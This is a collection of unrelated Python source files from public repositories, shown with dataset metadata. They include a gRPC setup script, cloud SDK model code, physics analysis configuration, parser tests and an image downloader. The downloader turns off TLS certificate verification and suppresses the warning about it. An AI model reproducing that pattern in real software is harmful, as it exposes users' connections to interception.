| 2023-08-03T16:44:16.844552
| 2023-07-20T15:17:00
| 2023-07-23T16:09:30
| 220,016,632
| 341
| 40
|
BSD-3-Clause
| 2021-08-13T13:54:45
| 2019-11-06T14:32:31
| null |
UTF-8
|
Python
| false
| false
| 2,120
|
py
|
# Copyright 2021 The gRPC Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup module for CSDS in gRPC Python."""
import os
import sys
import setuptools
_PACKAGE_PATH = os.path.realpath(os.path.dirname(__file__))
_README_PATH = os.path.join(_PACKAGE_PATH, 'README.rst')
# Ensure we're in the proper directory whether or not we're being used by pip.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Break import-style to ensure we can actually find our local modules.
import grpc_version
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
]
PACKAGE_DIRECTORIES = {
'': '.',
}
INSTALL_REQUIRES = (
'protobuf>=4.21.6',
'xds-protos>=0.0.7',
'grpcio>={version}'.format(version=grpc_version.VERSION),
)
SETUP_REQUIRES = INSTALL_REQUIRES
setuptools.setup(name='grpcio-csds',
version=grpc_version.VERSION,
license='Apache License 2.0',
description='xDS configuration dump library',
long_description=open(_README_PATH, 'r').read(),
author='The gRPC Authors',
author_email='grpc-io@googlegroups.com',
classifiers=CLASSIFIERS,
url='https://grpc.io',
package_dir=PACKAGE_DIRECTORIES,
packages=setuptools.find_packages('.'),
python_requires='>=3.6',
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES)
|
[
"jengelh@inai.de"
] |
jengelh@inai.de
|
20119dd4bf027bc85b6d0743586dd8843d61e207
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-sa/huaweicloudsdksa/v2/model/update_playbook_action_request.py
|
65f38548f9f7ce143f3cb61570505abafe3b769a
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 6,398
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdatePlaybookActionRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'project_id': 'str',
'workspace_id': 'str',
'version_id': 'str',
'action_id': 'str',
'body': 'ModifyActionInfo'
}
attribute_map = {
'project_id': 'project_id',
'workspace_id': 'workspace_id',
'version_id': 'version_id',
'action_id': 'action_id',
'body': 'body'
}
def __init__(self, project_id=None, workspace_id=None, version_id=None, action_id=None, body=None):
"""UpdatePlaybookActionRequest
The model defined in huaweicloud sdk
:param project_id: ID of project
:type project_id: str
:param workspace_id: ID of workspace
:type workspace_id: str
:param version_id: version Id value
:type version_id: str
:param action_id: ID of action
:type action_id: str
:param body: Body of the UpdatePlaybookActionRequest
:type body: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
"""
self._project_id = None
self._workspace_id = None
self._version_id = None
self._action_id = None
self._body = None
self.discriminator = None
self.project_id = project_id
self.workspace_id = workspace_id
self.version_id = version_id
self.action_id = action_id
if body is not None:
self.body = body
@property
def project_id(self):
"""Gets the project_id of this UpdatePlaybookActionRequest.
ID of project
:return: The project_id of this UpdatePlaybookActionRequest.
:rtype: str
"""
return self._project_id
@project_id.setter
def project_id(self, project_id):
"""Sets the project_id of this UpdatePlaybookActionRequest.
ID of project
:param project_id: The project_id of this UpdatePlaybookActionRequest.
:type project_id: str
"""
self._project_id = project_id
@property
def workspace_id(self):
"""Gets the workspace_id of this UpdatePlaybookActionRequest.
ID of workspace
:return: The workspace_id of this UpdatePlaybookActionRequest.
:rtype: str
"""
return self._workspace_id
@workspace_id.setter
def workspace_id(self, workspace_id):
"""Sets the workspace_id of this UpdatePlaybookActionRequest.
ID of workspace
:param workspace_id: The workspace_id of this UpdatePlaybookActionRequest.
:type workspace_id: str
"""
self._workspace_id = workspace_id
@property
def version_id(self):
"""Gets the version_id of this UpdatePlaybookActionRequest.
version Id value
:return: The version_id of this UpdatePlaybookActionRequest.
:rtype: str
"""
return self._version_id
@version_id.setter
def version_id(self, version_id):
"""Sets the version_id of this UpdatePlaybookActionRequest.
version Id value
:param version_id: The version_id of this UpdatePlaybookActionRequest.
:type version_id: str
"""
self._version_id = version_id
@property
def action_id(self):
"""Gets the action_id of this UpdatePlaybookActionRequest.
ID of action
:return: The action_id of this UpdatePlaybookActionRequest.
:rtype: str
"""
return self._action_id
@action_id.setter
def action_id(self, action_id):
"""Sets the action_id of this UpdatePlaybookActionRequest.
ID of action
:param action_id: The action_id of this UpdatePlaybookActionRequest.
:type action_id: str
"""
self._action_id = action_id
@property
def body(self):
"""Gets the body of this UpdatePlaybookActionRequest.
:return: The body of this UpdatePlaybookActionRequest.
:rtype: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this UpdatePlaybookActionRequest.
:param body: The body of this UpdatePlaybookActionRequest.
:type body: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdatePlaybookActionRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
7cbb792e2cb7f0c7d51684f1e7fad31c4ff22284
|
23c944ff03ea82cb1b557780bbe9810a4f5e001c
|
/mymath/tests/features/increment-steps.py
|
61521a4c6f342460fe2a1e3af70507f51d283d1f
|
[] |
no_license
|
akshar-raaj/hack
|
711e13659530c0202879b815bf295efed661bb7d
|
4cab4d8ededd7adf8877b56741db2df7dabd0828
|
refs/heads/master
| 2020-04-04T00:33:29.900091
| 2015-09-05T12:05:13
| 2015-09-05T12:05:13
| 41,952,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
from lettuce import *
from fact import num, increment
@step('I have access to increment')
def access(step):
pass
@step('I use increment')
def use_increment(step):
increment()
@step('num is (\d+)')
def num_is(step, number):
number = int(number)
assert num == number, "Expected %d, found %d" % (number, num)
|
[
"akshar@agiliq.com"
] |
akshar@agiliq.com
|
ae7c82de852c37f2276fa60c5a266cb353d7610c
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/ggH/Full2016_nanoAOD/aliases.py
|
7e9a914cfb01546c67ef05e6dd9d77d585774d16
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 7,480
|
py
|
import os
import copy
import inspect
configurations = os.path.realpath(inspect.getfile(inspect.currentframe())) # this file
configurations = os.path.dirname(configurations) # ggH2016
configurations = os.path.dirname(configurations) # Differential
configurations = os.path.dirname(configurations) # Configurations
#aliases = {}
# imported from samples.py:
# samples, signals
mc = [skey for skey in samples if skey not in ('Fake', 'DATA')]
eleWP = 'mva_90p_Iso2016'
muWP = 'cut_Tight80x'
aliases['LepWPCut'] = {
'expr': 'LepCut2l__ele_'+eleWP+'__mu_'+muWP,
'samples': mc + ['DATA']
}
aliases['gstarLow'] = {
'expr': 'Gen_ZGstar_mass >0 && Gen_ZGstar_mass < 4',
'samples': 'VgS'
}
aliases['gstarHigh'] = {
'expr': 'Gen_ZGstar_mass <0 || Gen_ZGstar_mass > 4',
'samples': 'VgS'
}
# Fake leptons transfer factor
aliases['fakeW'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP,
'samples': ['Fake']
}
# And variations - already divided by central values in formulas !
aliases['fakeWEleUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_EleUp',
'samples': ['Fake']
}
aliases['fakeWEleDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_EleDown',
'samples': ['Fake']
}
aliases['fakeWMuUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_MuUp',
'samples': ['Fake']
}
aliases['fakeWMuDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_MuDown',
'samples': ['Fake']
}
aliases['fakeWStatEleUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statEleUp',
'samples': ['Fake']
}
aliases['fakeWStatEleDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statEleDown',
'samples': ['Fake']
}
aliases['fakeWStatMuUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statMuUp',
'samples': ['Fake']
}
aliases['fakeWStatMuDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statMuDown',
'samples': ['Fake']
}
# gen-matching to prompt only (GenLepMatch2l matches to *any* gen lepton)
aliases['PromptGenLepMatch2l'] = {
'expr': 'Alt$(Lepton_promptgenmatched[0]*Lepton_promptgenmatched[1], 0)',
'samples': mc
}
aliases['Top_pTrw'] = {
'expr': '(topGenPt * antitopGenPt > 0.) * (TMath::Sqrt(TMath::Exp(0.0615 - 0.0005 * topGenPt) * TMath::Exp(0.0615 - 0.0005 * antitopGenPt))) + (topGenPt * antitopGenPt <= 0.)',
'samples': ['top']
}
# Jet bins
# using Alt$(CleanJet_pt[n], 0) instead of Sum$(CleanJet_pt >= 30) because jet pt ordering is not strictly followed in JES-varied samples
# No jet with pt > 30 GeV
aliases['zeroJet'] = {
'expr': 'Alt$(CleanJet_pt[0], 0) < 30.'
}
aliases['oneJet'] = {
'expr': 'Alt$(CleanJet_pt[0], 0) > 30.'
}
aliases['multiJet'] = {
'expr': 'Alt$(CleanJet_pt[1], 0) > 30.'
}
# B tagging
aliases['bVeto'] = {
'expr': 'Sum$(CleanJet_pt > 20. && abs(CleanJet_eta) < 2.5 && Jet_btagDeepB[CleanJet_jetIdx] > 0.2217) == 0'
}
aliases['bReq'] = {
'expr': 'Sum$(CleanJet_pt > 30. && abs(CleanJet_eta) < 2.5 && Jet_btagDeepB[CleanJet_jetIdx] > 0.2217) >= 1'
}
# CR definitions
aliases['topcr'] = {
'expr': 'mtw2>30 && mll>50 && ((zeroJet && !bVeto) || bReq)'
}
aliases['dycr'] = {
'expr': 'mth<60 && mll>40 && mll<80 && bVeto'
}
aliases['wwcr'] = {
'expr': 'mth>60 && mtw2>30 && mll>100 && bVeto'
}
# SR definition
aliases['sr'] = {
'expr': 'mth>60 && mtw2>30 && bVeto'
}
# B tag scale factors
btagSFSource = '%s/src/PhysicsTools/NanoAODTools/data/btagSF/DeepCSV_2016LegacySF_V1.csv' % os.getenv('CMSSW_BASE')
aliases['Jet_btagSF_shapeFix'] = {
'linesToAdd': [
'gSystem->Load("libCondFormatsBTauObjects.so");',
'gSystem->Load("libCondToolsBTau.so");',
'gSystem->AddIncludePath("-I%s/src");' % os.getenv('CMSSW_RELEASE_BASE'),
'.L %s/patches/btagsfpatch.cc+' % configurations
],
'class': 'BtagSF',
'args': (btagSFSource,),
'samples': mc
}
aliases['bVetoSF'] = {
'expr': 'TMath::Exp(Sum$(TMath::Log((CleanJet_pt>20 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<20 || abs(CleanJet_eta)>2.5))))',
'samples': mc
}
aliases['bReqSF'] = {
'expr': 'TMath::Exp(Sum$(TMath::Log((CleanJet_pt>30 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<30 || abs(CleanJet_eta)>2.5))))',
'samples': mc
}
aliases['btagSF'] = {
'expr': '(bVeto || (topcr && zeroJet))*bVetoSF + (topcr && !zeroJet)*bReqSF',
'samples': mc
}
for shift in ['jes','lf','hf','lfstats1','lfstats2','hfstats1','hfstats2','cferr1','cferr2']:
aliases['Jet_btagSF_shapeFix_up_%s' % shift] = {
'class': 'BtagSF',
'args': (btagSFSource, 'up_' + shift),
'samples': mc
}
aliases['Jet_btagSF_shapeFix_down_%s' % shift] = {
'class': 'BtagSF',
'args': (btagSFSource, 'down_' + shift),
'samples': mc
}
for targ in ['bVeto', 'bReq']:
alias = aliases['%sSF%sup' % (targ, shift)] = copy.deepcopy(aliases['%sSF' % targ])
alias['expr'] = alias['expr'].replace('btagSF_shapeFix', 'btagSF_shapeFix_up_%s' % shift)
alias = aliases['%sSF%sdown' % (targ, shift)] = copy.deepcopy(aliases['%sSF' % targ])
alias['expr'] = alias['expr'].replace('btagSF_shapeFix', 'btagSF_shapeFix_down_%s' % shift)
aliases['btagSF%sup' % shift] = {
'expr': aliases['btagSF']['expr'].replace('SF', 'SF' + shift + 'up'),
'samples': mc
}
aliases['btagSF%sdown' % shift] = {
'expr': aliases['btagSF']['expr'].replace('SF', 'SF' + shift + 'down'),
'samples': mc
}
# data/MC scale factors
aliases['SFweight'] = {
'expr': ' * '.join(['SFweight2l', 'LepSF2l__ele_' + eleWP + '__mu_' + muWP, 'LepWPCut', 'btagSF', 'PrefireWeight']),
'samples': mc
}
# variations
aliases['SFweightEleUp'] = {
'expr': 'LepSF2l__ele_'+eleWP+'__Up',
'samples': mc
}
aliases['SFweightEleDown'] = {
'expr': 'LepSF2l__ele_'+eleWP+'__Do',
'samples': mc
}
aliases['SFweightMuUp'] = {
'expr': 'LepSF2l__mu_'+muWP+'__Up',
'samples': mc
}
aliases['SFweightMuDown'] = {
'expr': 'LepSF2l__mu_'+muWP+'__Do',
'samples': mc
}
aliases['nllWOTF'] = {
'linesToAdd': ['.L %s/Differential/nllW.cc+' % configurations],
'class': 'WWNLLW',
'args': ('central',),
'samples': ['WW']
}
# In WpWmJJ_EWK events, partons [0] and [1] are always the decay products of the first W
aliases['lhe_mW1'] = {
'expr': 'TMath::Sqrt(2. * LHEPart_pt[0] * LHEPart_pt[1] * (TMath::CosH(LHEPart_eta[0] - LHEPart_eta[1]) - TMath::Cos(LHEPart_phi[0] - LHEPart_phi[1])))',
'samples': ['WWewk']
}
# and [2] [3] are the second W
aliases['lhe_mW2'] = {
'expr': 'TMath::Sqrt(2. * LHEPart_pt[2] * LHEPart_pt[3] * (TMath::CosH(LHEPart_eta[2] - LHEPart_eta[3]) - TMath::Cos(LHEPart_phi[2] - LHEPart_phi[3])))',
'samples': ['WWewk']
}
# use HTXS_njets30 when moving to NanoAODv5 for all trees
aliases['nCleanGenJet'] = {
'linesToAdd': ['.L %s/Differential/ngenjet.cc+' % configurations],
'class': 'CountGenJet',
'samples': signals
}
# GGHUncertaintyProducer wasn't run for 2016 nAODv5 non-private
thus = [
'ggH_mu',
'ggH_res',
'ggH_mig01',
'ggH_mig12',
'ggH_VBF2j',
'ggH_VBF3j',
'ggH_pT60',
'ggH_pT120',
'ggH_qmtop'
]
for thu in thus:
aliases[thu] = {
'linesToAdd': ['.L %s/Differential/gghuncertainty.cc+' % configurations],
'class': 'GGHUncertainty',
'args': (thu,),
'samples': ['ggH_hww'],
'nominalOnly': True
}
|
[
"lorenzo.viliani@cern.ch"
] |
lorenzo.viliani@cern.ch
|
adff771b2088a82c77b2f650a290c0117b99034f
|
5eb29ce7104e10a399d9afd7e253f029bf8bc0ff
|
/cu_image_search/memex_tools/image_dl.py
|
dd8e2583167f9141fbc46ae7257f0a4980fbc490
|
[
"BSD-2-Clause"
] |
permissive
|
svebk/DeepSentiBank_memex
|
69789dc09316e97aad711edeb251837a60184e7e
|
4e69ce66e3a177817ff360ddc263f55c6e0b63f7
|
refs/heads/master
| 2021-01-18T18:55:10.870052
| 2017-10-19T22:51:29
| 2017-10-19T22:51:29
| 36,091,024
| 22
| 1
| null | 2017-02-09T20:31:20
| 2015-05-22T19:20:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,721
|
py
|
import os
import requests
import shutil
import time
import warnings
import numpy as np
imagedltimeout = 3
session = requests.Session()
session.trust_env = False
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def mkpath(outpath):
pos_slash=[pos for pos,c in enumerate(outpath) if c=="/"]
for pos in pos_slash:
try:
os.mkdir(outpath[:pos])
except:
pass
def dlimage_basepath(url,basepath,logf=None):
start_time = time.time()
if not url:
return None
pos_slash=[pos for pos,c in enumerate(url) if c=="/"]
#pos_point=[pos for pos,c in enumerate(url) if c=="."]
if not pos_slash:
return None
file_img=url[pos_slash[-1]+1:]
# path with time and random to ensure unique names
outpath=os.path.join(basepath,str(time.time())+'_'+str(np.int32(np.random.random()*(10e6)))+'_'+file_img)
mkpath(outpath)
uptomkpath_time = time.time()
#print "Downloading image from {} to {}.".format(url,outpath)
try:
#r = requests.get(url, stream=True, timeout=imagedltimeout)
# still slow with session.trust_env
# verify=False induces a InsecureRequestWarning
r = session.get(url, stream=True, timeout=imagedltimeout, verify=False)
uptorequest_time = time.time()
if r.status_code == 200:
with open(outpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
uptowrite_time = time.time()
mkpath_time = uptomkpath_time - start_time
dl_time = uptorequest_time - uptomkpath_time
write_time = uptowrite_time - uptorequest_time
print("[dlimage_basepath] mkpath_time {}, dl_time {}, write_time {}".format(mkpath_time, dl_time, write_time))
return outpath
except Exception as inst:
if logf:
logf.write("Download failed for img that should be saved at {} from url {}.\n".format(outpath,url))
else:
print "Download failed for img that should be saved at {} from url {}.".format(outpath,url)
print inst
return None
def dlimage_basepath_integritycheck(url, basepath, logf=None):
import subprocess as sub
if not url:
return None
pos_slash = [pos for pos,c in enumerate(url) if c=="/"]
if not pos_slash:
return None
file_img = url[pos_slash[-1]+1:]
# path with time and random to ensure unique names
outpath = os.path.join(basepath,str(time.time())+'_'+str(np.int32(np.random.random()*(10e6)))+'_'+file_img)
mkpath(outpath)
#print "Downloading image from {} to {}.".format(url,outpath)
try:
#r = requests.get(url, stream=True, timeout=imagedltimeout)
# verify=False induces a InsecureRequestWarning
r = session.get(url, stream=True, timeout=imagedltimeout, verify=False)
if r.status_code == 200:
if int(r.headers['content-length']) == 0:
raise ValueError("Empty image.")
with open(outpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
# integrity check here
ok_tag = '[OK]'
error_tag = '[ERROR]'
command = 'jpeginfo -c '+ outpath
output, error = sub.Popen(command.split(' '), stdout=sub.PIPE, stderr=sub.PIPE).communicate()
if output.find(ok_tag)<0 or output.find(error_tag)>=0:
# some images are not JPEG, either PNG or even HTML...
raise ValueError("Integrity check failed, output was: {}".format(output.strip()))
return outpath
except Exception as inst:
if logf:
logf.write("[dlimage_basepath_integritycheck: error] Download failed for img that should be saved at {} from url {}. {}\n".format(outpath, url, inst))
else:
print "[dlimage_basepath_integritycheck: error] Download failed for img that should be saved at {} from url {}. {}".format(outpath, url, inst)
return None
def dlimage(url,logf=None):
return dlimage_basepath(url,'./',logf)
def dlimage_args(args):
if len(args)==2:
#print args[0],args[1]
return dlimage_basepath(args[0],args[1])
else:
print "[dl_image_args: warning] incorrect agruments: {}.".format(args)
return None
def dlimage_args_integritycheck(args):
if len(args)==2:
#print args[0],args[1]
return dlimage_basepath_integritycheck(args[0], args[1])
else:
print "[dl_image_args_integritycheck: warning] incorrect agruments: {}.".format(args)
return None
|
[
"svebor.karaman@gmail.com"
] |
svebor.karaman@gmail.com
|
5d7ac2ba25b18ff4484f8328d3f21f2d5fe93401
|
810ce1c1ac47743e253171ec7541c0e431d952c2
|
/standard_library/Concurrency/Subprocess/subprocess_signal_parent_shell.py
|
f65410bbf08ac27c3089d736b913256dd8f8f41d
|
[] |
no_license
|
hjlarry/practise-py
|
91052c25dc7ab706c6234f6d657db76667a27124
|
871e06b9652d356f55e3888f1f7ea180ac2b1954
|
refs/heads/master
| 2022-09-11T17:47:48.557194
| 2022-08-10T02:07:24
| 2022-08-10T02:07:24
| 136,263,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
"""
用于发送信号的 pid 与等待信号的运行 shell 脚本的子进程 id 不同,因为这个例子中有三个独立的进程在交互:
1. 主程序 subprocess_signal_parent_shell.py
2. 主程序创建的运行脚本的 shell 进程。
3. 程序signal_child.py
如果由 Popen 创建的进程产生子进程,那么子进程将不会收到任何发送给父进程的任何信号。
"""
import os
import signal
import subprocess
import tempfile
import time
import sys
print("由于父进程创建的子进程是shell,shell再创建的进程才是signal_child,signal_child无法收到信号")
script = """#!/bin/sh
echo "Shell script in process $$"
set -x
python3 signal_child.py
"""
script_file = tempfile.NamedTemporaryFile("wt")
script_file.write(script)
script_file.flush()
proc = subprocess.Popen(["sh", script_file.name])
print(f"Parent: Pausing before signal {proc.pid}")
sys.stdout.flush()
time.sleep(1)
print(f"Parent: Signaling child {proc.pid}")
sys.stdout.flush()
os.kill(proc.pid, signal.SIGUSR1)
time.sleep(3)
|
[
"hjlarry@163.com"
] |
hjlarry@163.com
|
e27f776e66186c3805e38f5fe1037c380b83a772
|
97f2f0d821ce8d12b6d03f200692721418458e4b
|
/ths/test/testsentimentensemble.py
|
828bd399e2ea80bf67545e102de46b91a1a2fe46
|
[] |
no_license
|
manuelr417/DetectDiseaseTHS
|
0851f3c2fe5caa460eacfe1fc57c790fcd43fd0a
|
43ae6482a4e3009fcf0899d0a1047590c4c77f7f
|
refs/heads/master
| 2021-04-15T08:23:43.430178
| 2020-04-13T11:46:34
| 2020-04-13T11:46:34
| 126,485,918
| 0
| 3
| null | 2018-10-17T13:32:44
| 2018-03-23T13:01:29
|
Python
|
UTF-8
|
Python
| false
| false
| 488
|
py
|
from ths.nn.sequences.processemsemble import ProcessTweetsWord2VecOnePassEnsemble
def main():
print("Working:")
#P = ProcessTweetsWord2VecOnePass2DCNNv2_1("data/cleantextlabels3.csv", "trained/embedding3.csv")
P = ProcessTweetsWord2VecOnePassEnsemble("data/cleantextlabels3.csv", "data/glove.6B.50d.txt")
#Bueno el model12cnnv2
P.process("trained/modelensemble6.json", "trained/modelensemble6.h5", plot=True, epochs=20)
#joderme
if __name__ == "__main__":
main()
|
[
"manuel.rodriguez7@upr.edu"
] |
manuel.rodriguez7@upr.edu
|
64e423abf7ebbca4e0426ebdce632030f0eb92f9
|
ae87b11560c543cb678c52a28916ea2252d7aa52
|
/tests/parsers/mac_appfirewall.py
|
af22d404ed067295db1745d695a435ad49dfadcc
|
[
"Apache-2.0"
] |
permissive
|
CNR-ITTIG/plasodfaxp
|
19ccf77d0be62cfa8a9b246eb6797cf64a480d80
|
923797fc00664fa9e3277781b0334d6eed5664fd
|
refs/heads/master
| 2016-09-13T11:14:08.877399
| 2016-04-11T15:01:42
| 2016-04-11T15:01:42
| 55,975,921
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,765
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for Mac AppFirewall log file parser."""
import unittest
# pylint: disable=unused-import
from plaso.formatters import mac_appfirewall as mac_appfirewall_formatter
from plaso.lib import timelib
from plaso.parsers import mac_appfirewall
from tests.parsers import test_lib
class MacAppFirewallUnitTest(test_lib.ParserTestCase):
"""Tests for Mac AppFirewall log file parser."""
def setUp(self):
"""Makes preparations before running an individual test."""
self._parser = mac_appfirewall.MacAppFirewallParser()
def testParseFile(self):
"""Test parsing of a Mac Wifi log file."""
knowledge_base_values = {u'year': 2013}
test_file = self._GetTestFilePath([u'appfirewall.log'])
event_queue_consumer = self._ParseFile(
self._parser, test_file, knowledge_base_values=knowledge_base_values)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 47)
event_object = event_objects[0]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-11-02 04:07:35')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(event_object.agent, u'socketfilterfw[112]')
self.assertEqual(event_object.computer_name, u'DarkTemplar-2.local')
self.assertEqual(event_object.status, u'Error')
self.assertEqual(event_object.process_name, u'Logging')
self.assertEqual(event_object.action, u'creating /var/log/appfirewall.log')
expected_msg = (
u'Computer: DarkTemplar-2.local '
u'Agent: socketfilterfw[112] '
u'Status: Error '
u'Process name: Logging '
u'Log: creating /var/log/appfirewall.log')
expected_msg_short = (
u'Process name: Logging '
u'Status: Error')
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
event_object = event_objects[9]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-11-03 13:25:15')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(event_object.agent, u'socketfilterfw[87]')
self.assertEqual(event_object.computer_name, u'DarkTemplar-2.local')
self.assertEqual(event_object.status, u'Info')
self.assertEqual(event_object.process_name, u'Dropbox')
self.assertEqual(event_object.action, u'Allow TCP LISTEN (in:0 out:1)')
expected_msg = (
u'Computer: DarkTemplar-2.local '
u'Agent: socketfilterfw[87] '
u'Status: Info '
u'Process name: Dropbox '
u'Log: Allow TCP LISTEN (in:0 out:1)')
expected_msg_short = (
u'Process name: Dropbox '
u'Status: Info')
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
# Check repeated lines.
event_object = event_objects[38]
repeated_event_object = event_objects[39]
self.assertEqual(event_object.agent, repeated_event_object.agent)
self.assertEqual(
event_object.computer_name, repeated_event_object.computer_name)
self.assertEqual(event_object.status, repeated_event_object.status)
self.assertEqual(
event_object.process_name, repeated_event_object.process_name)
self.assertEqual(event_object.action, repeated_event_object.action)
# Year changes.
event_object = event_objects[45]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-12-31 23:59:23')
self.assertEqual(event_object.timestamp, expected_timestamp)
event_object = event_objects[46]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2014-01-01 01:13:23')
self.assertEqual(event_object.timestamp, expected_timestamp)
if __name__ == '__main__':
unittest.main()
|
[
"dfirfpi@gmail.com"
] |
dfirfpi@gmail.com
|
f0148135b7890c0e3aa022d70d08522b3a367bec
|
c49a6e67a63a541f8d420e725af155505d1e7f84
|
/Tree/unique-binary-search-trees-ii.py
|
edd7063cc4f05e9ecfc78755a5d57aa38199fcdf
|
[] |
no_license
|
wttttt-wang/leetcode_withTopics
|
b41ed0f8a036fd00f3b457e5b56efe32f872ca13
|
e2837f3d6c23f012148a2d1f9d0ef6d34d4e6912
|
refs/heads/master
| 2021-09-05T05:03:47.519344
| 2018-01-24T08:28:58
| 2018-01-24T08:28:58
| 112,893,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
"""
Unique Binary Search Trees II
@ Tree + Recursion
"""
class Solution(object):
def generateTrees(self, n):
"""
:type n: int
:rtype: List[TreeNode]
"""
if n < 1:
return []
return self.helper(1, n)
def helper(self, start, end):
if start > end:
return [None]
results = []
for i in range(start, end + 1):
ls, rs = self.helper(start, i - 1), self.helper(i + 1, end)
for l in ls:
for r in rs:
root = TreeNode(i)
root.left, root.right = l, r
results.append(root)
return results
|
[
"wttttt@Wttttt-de-MacBookPro.local"
] |
wttttt@Wttttt-de-MacBookPro.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.